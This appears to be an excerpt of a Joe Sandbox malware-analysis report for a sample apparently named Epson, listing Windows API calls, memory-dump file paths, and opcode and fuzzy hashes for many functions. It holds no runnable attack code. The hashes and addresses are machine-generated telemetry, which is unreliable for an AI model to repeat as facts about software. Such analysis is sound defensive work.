                                                                                                                                                                                                                                      • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                      • Opcode ID: ef51a833da45b3d9a9fb2c1ee46d6ce96ee2ddca2803f0638fd767e938abc94f
                                                                                                                                                                                                                                      • Instruction ID: 022d012f6857a02165f9e2b83a9817e0359c8c6d186c1592896f891d0f608ef2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef51a833da45b3d9a9fb2c1ee46d6ce96ee2ddca2803f0638fd767e938abc94f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C831E6396002059FC710CF28C485E6977F2EF54328F28815BE9168B392C731EE41EB62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FE49DC
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FE49F0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FE4A14
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                      • Opcode ID: 8fac3631b67e267f463f1197ef45d7bda1584bfc69b1f42e3cb5198de5a57bc4
                                                                                                                                                                                                                                      • Instruction ID: ddd6cc704afc36bb7ce3df3b4a5e692486f74ef582c51ecdcc6b98beb5ef61a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fac3631b67e267f463f1197ef45d7bda1584bfc69b1f42e3cb5198de5a57bc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2821B132540259ABDF118F55CC82FEF3B69EF88724F110218FA157B090D6B5B855AB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FE51A3
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FE51B1
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FE51B8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                      • Opcode ID: 342620e8677b4afaf61a57da54f0470af6eab8eeaca4dd1942de5f784f0b1c58
                                                                                                                                                                                                                                      • Instruction ID: 8a533d55b42d4cbed41ad11637aca7e4dc905b6e596775660a4d4b8592c072eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 342620e8677b4afaf61a57da54f0470af6eab8eeaca4dd1942de5f784f0b1c58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3421A1B5600649AFDB10DF55CC81EB737ADEF5A7A8B100059FA009B351CB79EC11EBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FE42DC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FE42EC
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FE4312
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                      • Opcode ID: dce2ba4d254846972719ff9defc8a5b76b359ecd9e4cdc9398168960f5734925
                                                                                                                                                                                                                                      • Instruction ID: 99f8708e7a7f47cde933d2ea1276f048269b0c408d492b836eab579227b6c54e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dce2ba4d254846972719ff9defc8a5b76b359ecd9e4cdc9398168960f5734925
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D219532A10158BFDF118F95DC85FAB376EEF89764F118118FA049B190C675AC51A790
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FC544D
                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FC54A1
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00FEDCD0), ref: 00FC5515
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                                                                                      • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                      • Opcode ID: 08882b5e9f9d30caf94e3e0961330fecae1276af5f47e6ae6b7b7a8e098b7450
                                                                                                                                                                                                                                      • Instruction ID: 08b42ad72291f82171843f124ca11c1c175555b5d31fd3c0ef31ad784ed743bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08882b5e9f9d30caf94e3e0961330fecae1276af5f47e6ae6b7b7a8e098b7450
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01319370A00109AFDB00DF54C985EAA7BF8EF04318F144099F909DF262DB75EE45EB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FE4CED
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FE4D02
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FE4D0F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                      • Opcode ID: ef054548f4ca2c21da6bccbe27dbbdd09802642a01d1b2be292237f2500087fb
                                                                                                                                                                                                                                      • Instruction ID: 5cb7212620410e916789e711988fb729fb3e81ae3bfea50c1e51a4640365d543
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef054548f4ca2c21da6bccbe27dbbdd09802642a01d1b2be292237f2500087fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA112971640288BEEF215F6ACC06FAB37ECEF89B65F110519FA55E60A0C271EC51EB10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                        • Part of subcall function 00FB36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FB3712
                                                                                                                                                                                                                                        • Part of subcall function 00FB36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FB3723
                                                                                                                                                                                                                                        • Part of subcall function 00FB36F4: GetCurrentThreadId.KERNEL32 ref: 00FB372A
                                                                                                                                                                                                                                        • Part of subcall function 00FB36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FB3731
                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00FB38C4
                                                                                                                                                                                                                                        • Part of subcall function 00FB373B: GetParent.USER32(00000000), ref: 00FB3746
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FB390F
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,00FB3987), ref: 00FB3937
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                                                                      • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                      • Opcode ID: 06b3cce835cc3bcdaa5fab9e756ac6edb64108ca5901c55808e90045e004934b
                                                                                                                                                                                                                                      • Instruction ID: 55332db4499525ac35b98154fde18a9a80cf392a27487a5cf03a2048bfa36224
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06b3cce835cc3bcdaa5fab9e756ac6edb64108ca5901c55808e90045e004934b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E511D571640249ABCF01BF758CC5EED77AA9F94350F044069BD099B252DE75990AAF20
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FE6360
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FE638D
                                                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 00FE639C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 22cdb560fe98749fce42a657e0952c91b0aef29f8a298f17ce8104691d8b07da
                                                                                                                                                                                                                                      • Instruction ID: 2b39ac8f7060594588607c429cb0e8c800763da5450642a040e1492b66e60752
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22cdb560fe98749fce42a657e0952c91b0aef29f8a298f17ce8104691d8b07da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE015E32500298EFDB119F11DC84BAA7BB4FF447A5F148099E449DA150DF708985FF21
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 55aae5e46460c4ed9589294ca32597e35d26833f3f916ed7977c85e52f4e2174
                                                                                                                                                                                                                                      • Instruction ID: c6314a663327f6a845124dbf984f30493fcfbed721e1e0a1f831e0355f1ba51a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55aae5e46460c4ed9589294ca32597e35d26833f3f916ed7977c85e52f4e2174
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EC15B75A0021AAFCB14CF95C884EAEBBB5FF88714F108598E405EB251DB31EE41EF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                      • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                      • Instruction ID: ffd3a7f87865c4c0c93934b7e9998f090521280160229799ead50dd14bfc7737
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7A14872D043879FEB21EF58C8917EEBBE4EF51324F2441ADE9959B281C338A941E750
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FF0BD4,?), ref: 00FB0EE0
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FF0BD4,?), ref: 00FB0EF8
                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00FEDCE0,000000FF,?,00000000,00000800,00000000,?,00FF0BD4,?), ref: 00FB0F1D
                                                                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 00FB0F3E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 314563124-0
                                                                                                                                                                                                                                      • Opcode ID: c4386d03b76002c0676a1b764929a886f8fb8701a51af7377d200e1ee6c0a939
                                                                                                                                                                                                                                      • Instruction ID: 8573df98dc2d9f9ce1ffe6b21b7fc9f7e20633ed4cfd35c362038c344cbef35a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4386d03b76002c0676a1b764929a886f8fb8701a51af7377d200e1ee6c0a939
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F381E671A00109EFCB14DF94C984EEEB7B9FF89315B204598F506AB250DB71AE06DB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00FDB10C
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00FDB11A
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00FDB1FC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FDB20B
                                                                                                                                                                                                                                        • Part of subcall function 00F6E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F94D73,?), ref: 00F6E395
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1991900642-0
                                                                                                                                                                                                                                      • Opcode ID: 259b579af873035a407bc213679b3db5c7b0f953a9aa740f4d2eabe0480557a5
                                                                                                                                                                                                                                      • Instruction ID: b248d93554891147a9914d24af3c7fa674002a51db1f7346d9ad6e6dad842acf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 259b579af873035a407bc213679b3db5c7b0f953a9aa740f4d2eabe0480557a5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35515B71908300AFD310EF24CC86A6BBBE8FF89754F44492DF98597291EB34D909DB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: 40d09acc4c2593ee041ca815fbd92ad003b596605e2bb19f09fcebe0380d284a
                                                                                                                                                                                                                                      • Instruction ID: c13d435be66351d29613ec41ab2a66f55cc16b240d7b788631da8938d49a4675
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40d09acc4c2593ee041ca815fbd92ad003b596605e2bb19f09fcebe0380d284a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85412B32A00103ABFF217BF98C86ABE3AA4FF41770F144636F418D6291E67949417763
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00FD255A
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00FD2568
                                                                                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FD25E7
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00FD25F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1881357543-0
                                                                                                                                                                                                                                      • Opcode ID: 96a1cd397332f1d929285dfc478a07210e4e801e44c3e5af35ad3f9a1e4054e8
                                                                                                                                                                                                                                      • Instruction ID: a181dc02306fab6cbcfac354a90129533eb08f11c51ec58e017ab3fd5a20a49a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96a1cd397332f1d929285dfc478a07210e4e801e44c3e5af35ad3f9a1e4054e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F841C274A00300AFE720AF24DC86F2A77A5AF54758F58C448FA169F3D2C776ED429B90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00FE6D1A
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00FE6D4D
